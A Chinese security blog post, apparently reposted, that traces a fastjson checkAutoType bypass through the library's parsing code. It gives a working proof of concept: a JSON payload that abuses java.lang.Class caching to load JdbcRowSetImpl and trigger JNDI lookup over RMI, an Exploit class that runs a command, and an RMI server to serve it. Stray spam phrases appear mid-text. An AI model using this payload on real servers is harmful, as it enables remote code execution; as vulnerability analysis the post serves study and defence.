來源於:https://blog.csdn.net/systemino/article/details/98188007
前言
寫的有點多,可能對師傅們來說比較啰嗦,不過這么寫完感覺自己也就明白了
poc
newPoc.java
-
import com.alibaba.fastjson.JSON;
-
-
public class newPoc {
-
public static void main(String[] argv) {
-
String payload = "{"name":{"
-
""xxxx":{"
-
""rmi://localhost:1099/Exploit","autoCommit":true}}}";
-
JSON.parse(payload);
-
}
-
}
Exploit.java
-
import javax.naming.Context;
-
import javax.naming.Name;
-
import javax.naming.spi.ObjectFactory;
-
import java.io.IOException;
-
import java.util.Hashtable;
-
-
public class Exploit implements ObjectFactory {
-
-
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
-
exec( "xterm");
-
return null;
-
}
-
-
public static String exec(String cmd) {
-
try {
-
Runtime.getRuntime().exec( "/Applications/Calculator.app/Contents/MacOS/Calculator");
-
} catch (IOException e) {
-
e.printStackTrace();
-
}
-
return "";
-
}
-
-
public static void main(String[] args) {
-
exec( "123");
-
}
-
}
rmiServer.java
-
import com.sun.jndi.rmi.registry.ReferenceWrapper;
-
-
import javax.naming.Reference;
-
import java.rmi.registry.LocateRegistry;
-
import java.rmi.registry.Registry;
-
-
public class rmiServer {
-
public static void main(String[] args) throws Exception {
-
Registry registry = LocateRegistry.createRegistry(1099);
-
Reference reference = new Reference("Exploit", "Exploit", "http://localhost:1099/");
-
ReferenceWrapper wrapper = new ReferenceWrapper(reference);
-
System.out.println("service bind at 1099");
-
registry.bind( "Exploit", wrapper);
-
}
-
}
-
{
-
"name":{
-
"@type":"java.lang.Class",
-
"val":"com.sun.rowset.JdbcRowSetImpl"
-
},
-
"xxxx":{
-
"@type":"com.sun.rowset.JdbcRowSetImpl",
-
"dataSourceName":"rmi://localhost:1099/Exploit",
-
"autoCommit":true
-
}
-
}
漏洞觸發流程
在JSON.parse處下斷點,單步進入到JSON這個類中,開始了fastjson庫的解析過程
經過幾個parse函數(java中,一個函數由函數名和函數參數唯一確定,也就是java中的函數簽名),雖然同為parse這個函數,但是函數參數不同,故進入到不同的函數中 PHP大馬
-
public static Object parse(String text) {
-
return parse(text, DEFAULT_PARSER_FEATURE);
-
}
-
-
public static Object parse(String text, int features) {
-
return parse(text, ParserConfig.getGlobalInstance(), features);
-
}
-
-
public static Object parse(String text, ParserConfig config, int features) {
-
if (text == null) {
-
return null;
-
} else {
-
DefaultJSONParser parser = new DefaultJSONParser(text, config, features);
-
Object value = parser.parse();
-
parser.handleResovleTask( value);
-
parser.close();
-
return value;
-
}
-
}
在最后一個parse中,真正進入到json解析的流程
0x01 總覽
我們先不急着跟下去,因為java的調用鏈一般來說比較深,所以我們先看一下整個大體的流程是什么樣,來自己判斷一下這些函數都是用來干什么的,先宏觀的看,再跟進去一步步看它在做什么
DefaultJSONParser parser = new DefaultJSONParser(text, config, features);
初始化一個默認的json解析器
Object value = parser.parse();
調用這個json解析器的parse函數,來進行json解析
parser.handleResovleTask(value);
這個函數暫時不知道干什么,先放着 天天好彩
parser.close();
將解析器關閉
return value;
返回json解析的結果
可以看出來,我們真正需要關注的,其實就是DefaultJSONParser的生成和DefaultJSONParser對我們輸入json數據的處理
0x02 初始化json解析器(DefaultJSONParser parser = new DefaultJSONParser(text, config, features);)
- 在DefaultJSONParser這個類中有一部分靜態代碼塊,在實例化它的時候,最先調用靜態代碼塊
-
static {
-
Class<?>[] classes = new Class[]{ Boolean.TYPE, Byte.TYPE, Short.TYPE, Integer.TYPE, Long.TYPE, Float.TYPE, Double.TYPE, Boolean.class, Byte.class, Short.class, Integer.class, Long.class, Float.class, Double.class, BigInteger.class, BigDecimal.class, String.class};
-
Class[] var1 = classes;
-
int var2 = classes.length;
-
-
for(int var3 = 0; var3 < var2; ++var3) {
-
Class<?> clazz = var1[var3];
-
primitiveClasses.add(clazz);
-
}
-
-
}
這里就是把很多原生類都加入到了primitiveClasses這個集合中,供后面的使用
- 接下來調用DefaultJSONParser的構造函數
-
public DefaultJSONParser(String input, ParserConfig config, int features) {
-
this(input, new JSONScanner(input, features), config);
-
}
這里初始化了JSONScaner,對我們的json數據進行一些注冊
-
public JSONScanner(String input, int features) {
-
super(features);
-
this.text = input;
-
this.len = this.text.length();
-
this.bp = -1;
-
this.next();
-
if (this.ch == 'ufeff') {
-
this.next();
-
}
-
-
}
- 進入DefaultJSONParser初始化
-
public DefaultJSONParser(Object input, JSONLexer lexer, ParserConfig config) {
-
this.dateFormatPattern = JSON.DEFFAULT_DATE_FORMAT;
-
this.contextArrayIndex = 0;
-
this.resolveStatus = 0;
-
this.extraTypeProviders = null;
-
this.extraProcessors = null;
-
this.fieldTypeResolver = null;
-
this.autoTypeAccept = null;
-
this.lexer = lexer;
-
this.input = input;
-
this.config = config;
-
this.symbolTable = config.symbolTable;
-
int ch = lexer.getCurrent();
-
if (ch == '{') {
-
lexer.next();
-
((JSONLexerBase)lexer).token = 12;
-
} else if (ch == '[') {
-
lexer.next();
-
((JSONLexerBase)lexer).token = 14;
-
} else {
-
lexer.nextToken();
-
}
-
-
}
這里對一些成員變量進行注冊,並且我們的json數據開頭是’{‘,所以token被設置為12
至此,對DefaultJSONParser的初始化就結束了,可以看到在這一個函數中,做的主要還是對整個解析上下文的初始化,將json數據和之后需要用到的類進行注冊,以便后面的使用
0x03 開始json解析流程(Object value = parser.parse();)
進入到DefaultJSONParser的parse方法,fastjson的真正json解析就開始了
-
public Object parse() {
-
return this.parse((Object)null);
-
}
-
-
public Object parse(Object fieldName){
-
JSONLexer lexer = this.lexer;
-
switch(lexer.token()) {
-
......
-
case 12:
-
JSONObject object = new JSONObject(lexer.isEnabled(Feature.OrderedField));
-
return this.parseObject((Map)object, fieldName);
-
......
-
}
代碼比較長,在上面DefaultJSONParser的初始化中,將我們的token值設置為了12,所以進入到case 12這個條件中
- 先構建了一個JSONObject對象
- 進入到parseObject中
- 因為現在的token為12,所以一路if條件跳過,最后到else塊中
-
ParseContext context = this.context;
-
try {
-
Map map = object instanceof JSONObject ? ((JSONObject)object).getInnerMap() : object;
-
boolean setContextFlag = false;
-
-
while(true) {
-
lexer.skipWhitespace();
-
char ch = lexer.getCurrent();
-
if (lexer.isEnabled(Feature.AllowArbitraryCommas)) {
-
while(ch == ',') {
-
lexer.next();
-
lexer.skipWhitespace();
-
ch = lexer.getCurrent();
-
}
-
}
-
......
-
}
-
}
這是一個非常龐大的while循環,在這里面進行對json字符串的語法分析,以及各種判斷
0x04 巨大的while
json的解析過程是一個字符一個字符判斷的,和js的判斷機制有些類似
- 在while中先將鍵名解析出來
- 下一個值的開頭是’{‘
- 因為開頭是’{‘,意味着這是嵌套的一個json
- 之后到537行,再次調用parseObject,將鍵名傳入參數,來獲取對應鍵的值
可以將parseObject想像成一個魔法盒子,它會將你傳入的比如{‘xxx’:’xxx’}這樣的json解析,將它根據鍵值存到一個map里面,那么如果你傳入的是{‘xxx’ : {‘xxx’:’xxx’}}這樣形式的話,因為值也是一個鍵值對的形式,所以又會再次調用parseObject,那么最后的結果也就變成了一個map中嵌套一個map的結構
- 接下來,嵌套的這個json中就有意思了
java中的json不像php中的json那么單純,java中的json最重要的是它是java實現反序列化和序列化的很重要的手段,所以在fastjson中,定義了一些鍵,如果這些鍵出現的時候,那么這個鍵對應的值就不會被單純的認為是字符串
我們抽出來這個值:
-
"name":{
-
"@type":"java.lang.Class",
-
"val":"com.sun.rowset.JdbcRowSetImpl"
-
}
這個鍵名是@type,當我們繼續調試到292行的時候
這里判斷了兩個條件:
<1> key == JSON.DEFAULT_TYPE_KEY 判斷了是否為預設的特殊鍵名
<2> !lexer.isEnabled(Feature.DisableSpecialKeyDetect) 是否關閉了特殊鍵名的探測(默認開啟)
正是我們傳入的@type,所以這個json就不被認為是一個普通的字符串,而會是一個對象,這里也就進入了反序列化的地方
這里獲取到我們的@type的值為’java.lang.Class’
這里就是在第一次fastjson反序列化出現的之后補丁所添加的,它限制了反序列化的類的白名單和黑名單,這次包括之前的fastjson反序列化漏洞都是因為checkAutoType的問題導致的
0x05 checkAutoType
在這里,檢測了我們反序列化的類是否在黑名單里面,也就是下面的這一段:
這里,阿里玩了一個小技巧,為了防止攻擊者拿到禁止類的黑白名單,阿里並沒有直接拿類名稱來比較,而是拿類的一段字符串的hash來比較,這樣就不那么容易知道阿里的黑白名單具體是什么(當然已經有大佬搞出來了)
我們可以看到如果我們傳入的類符合this.denyHashCodes定義的hash的話,就不會反序列化這個類了,當然com.sun.rowset.JdbcRowSetImpl這個類必定是被禁止了的
之后再進行白名單的校驗,確保@type的這個類是完全沒問題的,所以這個地方,我們的惡意類不能進入到這一段代碼中,進去就是gg
繼續回到我們之前的流程,因為在IdentityHashMap中有java.lang.Class,也就是這個類被認為是安全的,所以在clazz = this.deserializers.findClass(typeName);這個地方就直接獲得了java.lang.Class對象
而之后的
-
if (clazz != null) {
-
if (expectClass != null && clazz != HashMap.class && !expectClass.isAssignableFrom(clazz)) {
-
throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
-
} else {
-
return clazz;
-
}
-
}
就直接返回了java.lang.Class對象
0x06 回到DefaultJSONParser
在checkAutoType檢測完成以后,我們的clazz變量就成了java.lang.Class對象
調用ObjectDeserializer deserializer = this.config.getDeserializer(clazz)
ObjectDeserializer derializer = (ObjectDeserializer)this.deserializers.get(type);
在這個地方我們獲得了對應的deserilizer:MiscCodec對象
之后調用了MiscCodec對象的deserilize方法
進入到這個方法中:
之后調用parser.parse()
走到了這里
這里通過String stringLiteral = lexer.stringVal();獲取到了val這個鍵名對應的值:com.sun.rowset.JdbcRowSetImpl,最后將這個字符串返回
后面對我們的java.lang.Class進行一系列的判斷,進入到
繼續跟進,一路進入到loadClass這個函數
簡單來說,這個函數判斷預先定義的類的map里面有沒有傳進來的這個className,如果沒有的話,就把它加進去
而這個map正是checkAutoType里面的map,這個地方就是漏洞的觸發點,通過將com.sun.rowset.JdbcRowSetImpl這個類加載到map中,從而繞過了checkAutoType的驗證,進而造成了反序列化
0x07 新一輪的json解析
前面說過,那個大while里面是解析json用的,在第一個鍵值對解析完了以后,繼續開始解析第二個鍵值對,也就是:
-
"xxxx":{
-
"@type":"com.sun.rowset.JdbcRowSetImpl",
-
"dataSourceName":"rmi://localhost:1099/Exploit",
-
"autoCommit":true
-
}
和前面的流程基本一摸一樣,檢測到@type字段,獲取到@type對應的值,也就是com.sun.rowset.JdbcRowSetImpl,進入到checkAutoType的檢驗,我們直接跟到checkAutoType的檢驗中
前面都沒什么好說的,最重要的是這一步:
我們跟進,來到了這個函數
-
public static Class<?> getClassFromMapping(String className) {
-
return ( Class)mappings.get(className);
-
}
而maps里面的值為:
-
"java.text.SimpleDateFormat" -> {Class@691} "class java.text.SimpleDateFormat"
-
"java.util.concurrent.ConcurrentHashMap" -> {Class@18} "class java.util.concurrent.ConcurrentHashMap"
-
"java.lang.InternalError" -> {Class@348} "class java.lang.InternalError"
-
"java.lang.StackOverflowError" -> {Class@7} "class java.lang.StackOverflowError"
-
"java.sql.Date" -> {Class@696} "class java.sql.Date"
-
"java.util.concurrent.atomic.AtomicInteger" -> {Class@40} "class java.util.concurrent.atomic.AtomicInteger"
-
"java.lang.Exception" -> {Class@227} "class java.lang.Exception"
-
"java.lang.IllegalStateException" -> {Class@700} "class java.lang.IllegalStateException"
-
"java.util.Calendar" -> {Class@702} "class java.util.Calendar"
-
"java.lang.InterruptedException" -> {Class@704} "class java.lang.InterruptedException"
-
"java.util.BitSet" -> {Class@192} "class java.util.BitSet"
-
"java.util.Hashtable" -> {Class@236} "class java.util.Hashtable"
-
"[C" -> {Class@341} "class [C"
-
"java.util.TreeMap" -> {Class@709} "class java.util.TreeMap"
-
"java.util.LinkedHashMap" -> {Class@111} "class java.util.LinkedHashMap"
-
"java.sql.Timestamp" -> {Class@712} "class java.sql.Timestamp"
-
"java.lang.IllegalArgumentException" -> {Class@75} "class java.lang.IllegalArgumentException"
-
"java.util.concurrent.TimeUnit" -> {Class@715} "class java.util.concurrent.TimeUnit"
-
"java.lang.InstantiationError" -> {Class@717} "class java.lang.InstantiationError"
-
"java.lang.IndexOutOfBoundsException" -> {Class@719} "class java.lang.IndexOutOfBoundsException"
-
"java.lang.VerifyError" -> {Class@721} "class java.lang.VerifyError"
-
"long" -> {Class@723} "long"
-
"java.lang.IllegalThreadStateException" -> {Class@725} "class java.lang.IllegalThreadStateException"
-
"java.util.WeakHashMap" -> {Class@279} "class java.util.WeakHashMap"
-
"java.lang.InstantiationException" -> {Class@728} "class java.lang.InstantiationException"
-
"java.lang.NoSuchMethodError" -> {Class@180} "class java.lang.NoSuchMethodError"
-
"[short" -> {Class@343} "class [S"
-
"java.lang.StackTraceElement" -> {Class@732} "class java.lang.StackTraceElement"
-
"[byte" -> {Class@340} "class [B"
-
"short" -> {Class@735} "short"
-
"java.lang.AutoCloseable" -> {Class@263} "interface java.lang.AutoCloseable"
-
"[D" -> {Class@346} "class [D"
-
"char" -> {Class@739} "char"
-
"java.lang.LinkageError" -> {Class@299} "class java.lang.LinkageError"
-
"java.lang.IllegalAccessError" -> {Class@742} "class java.lang.IllegalAccessError"
-
"[double" -> {Class@346} "class [D"
-
"java.sql.Time" -> {Class@745} "class java.sql.Time"
-
"java.lang.NegativeArraySizeException" -> {Class@747} "class java.lang.NegativeArraySizeException"
-
"java.util.Locale" -> {Class@294} "class java.util.Locale"
-
"java.lang.NullPointerException" -> {Class@186} "class java.lang.NullPointerException"
-
"[float" -> {Class@345} "class [F"
-
"[int" -> {Class@342} "class [I"
-
"java.util.HashMap" -> {Class@144} "class java.util.HashMap"
-
"java.lang.OutOfMemoryError" -> {Class@260} "class java.lang.OutOfMemoryError"
-
"java.util.IdentityHashMap" -> {Class@755} "class java.util.IdentityHashMap"
-
"[long" -> {Class@344} "class [J"
-
"java.lang.NoClassDefFoundError" -> {Class@758} "class java.lang.NoClassDefFoundError"
-
"double" -> {Class@760} "double"
-
"java.lang.StringIndexOutOfBoundsException" -> {Class@762} "class java.lang.StringIndexOutOfBoundsException"
-
"[Z" -> {Class@339} "class [Z"
-
"java.lang.IllegalMonitorStateException" -> {Class@188} "class java.lang.IllegalMonitorStateException"
-
"[boolean" -> {Class@339} "class [Z"
-
"java.util.Collections$EmptyMap" -> {Class@277} "class java.util.Collections$EmptyMap"
-
"java.util.concurrent.atomic.AtomicLong" -> {Class@316} "class java.util.concurrent.atomic.AtomicLong"
-
"java.util.HashSet" -> {Class@177} "class java.util.HashSet"
-
"java.util.concurrent.ConcurrentSkipListMap" -> {Class@770} "class java.util.concurrent.ConcurrentSkipListMap"
-
"[F" -> {Class@345} "class [F"
-
"java.lang.NumberFormatException" -> {Class@773} "class java.lang.NumberFormatException"
-
"[char" -> {Class@341} "class [C"
-
"java.util.concurrent.ConcurrentSkipListSet" -> {Class@776} "class java.util.concurrent.ConcurrentSkipListSet"
-
"int" -> {Class@778} "int"
-
"java.lang.Cloneable" -> {Class@254} "interface java.lang.Cloneable"
-
"com.sun.rowset.JdbcRowSetImpl" -> {Class@781} "class com.sun.rowset.JdbcRowSetImpl"
-
"java.awt.Point" -> {Class@783} "class java.awt.Point"
-
"[J" -> {Class@344} "class [J"
-
"java.awt.Font" -> {Class@786} "class java.awt.Font"
-
"java.lang.NoSuchFieldException" -> {Class@788} "class java.lang.NoSuchFieldException"
-
"java.util.TreeSet" -> {Class@790} "class java.util.TreeSet"
-
"java.lang.NoSuchMethodException" -> {Class@792} "class java.lang.NoSuchMethodException"
-
"[I" -> {Class@342} "class [I"
-
"java.awt.Rectangle" -> {Class@795} "class java.awt.Rectangle"
-
"java.util.UUID" -> {Class@797} "class java.util.UUID"
-
"java.lang.SecurityException" -> {Class@799} "class java.lang.SecurityException"
-
"java.lang.Object" -> {Class@256} "class java.lang.Object"
-
"java.util.Date" -> {Class@802} "class java.util.Date"
-
"java.lang.RuntimeException" -> {Class@49} "class java.lang.RuntimeException"
-
"java.awt.Color" -> {Class@805} "class java.awt.Color"
-
"com.alibaba.fastjson.JSONObject" -> {Class@555} "class com.alibaba.fastjson.JSONObject"
-
"java.lang.NoSuchFieldError" -> {Class@808} "class java.lang.NoSuchFieldError"
-
"java.lang.IllegalAccessException" -> {Class@810} "class java.lang.IllegalAccessException"
-
"[B" -> {Class@340} "class [B"
-
"java.util.LinkedHashSet" -> {Class@813} "class java.util.LinkedHashSet"
-
"byte" -> {Class@815} "byte"
-
"java.lang.TypeNotPresentException" -> {Class@817} "class java.lang.TypeNotPresentException"
-
"[S" -> {Class@343} "class [S"
-
"boolean" -> {Class@820} "boolean"
-
"float" -> {Class@822} "float"
而這個map,在第一部分的json解析的時候,我們成功加入了com.sun.rowset.JdbcRowSetImpl(見63行),所以這里直接可以返回JdbcRowSetImpl這個類
-
if (clazz != null) {
-
if (expectClass != null && clazz != HashMap.class && !expectClass.isAssignableFrom(clazz)) {
-
throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
-
} else {
-
return clazz;
-
}
-
}
因為在上面獲取的map中就返回了clazz的值,所以這里就直接返回了com.sun.rowset.JdbcRowSetImpl類,也就沒有了下面的黑白名單檢測,也就成功繞過了checkAutoType
0x08 JdbcRowSetImpl反序列化
最后在這個地方獲取了deserializer,並且通過這個deserializer反序列化了JdbcRowSetImpl類,最后成功調用lookup進行JNDI注入
因為這個地方牽扯到java asm直接生成字節碼,實在是有點看不懂,就只能跳過了,之后再學習吧,tcl
最后給一張經過asm之后的調用鏈吧
-
connect:643, JdbcRowSetImpl (com.sun.rowset)
-
setAutoCommit:4081, JdbcRowSetImpl (com.sun.rowset)
-
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
-
invoke:57, NativeMethodAccessorImpl (sun.reflect)
-
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
-
invoke:606, Method (java.lang.reflect)
-
setValue:110, FieldDeserializer (com.alibaba.fastjson.parser.deserializer)
-
deserialze:759, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
-
parseRest:1283, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
-
deserialze:-1, FastjsonASMDeserializer_1_JdbcRowSetImpl (com.alibaba.fastjson.parser.deserializer)
-
deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
-
parseObject:384, DefaultJSONParser (com.alibaba.fastjson.parser)
-
parseObject:544, DefaultJSONParser (com.alibaba.fastjson.parser)
-
parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)
-
parse:1322, DefaultJSONParser (com.alibaba.fastjson.parser)
-
parse:152, JSON (com.alibaba.fastjson)
-
parse:162, JSON (com.alibaba.fastjson)
-
parse:131, JSON (com.alibaba.fastjson)
-
main:10, newPoc (com.xiang.fastjson.poc)
本文由安全客原創發布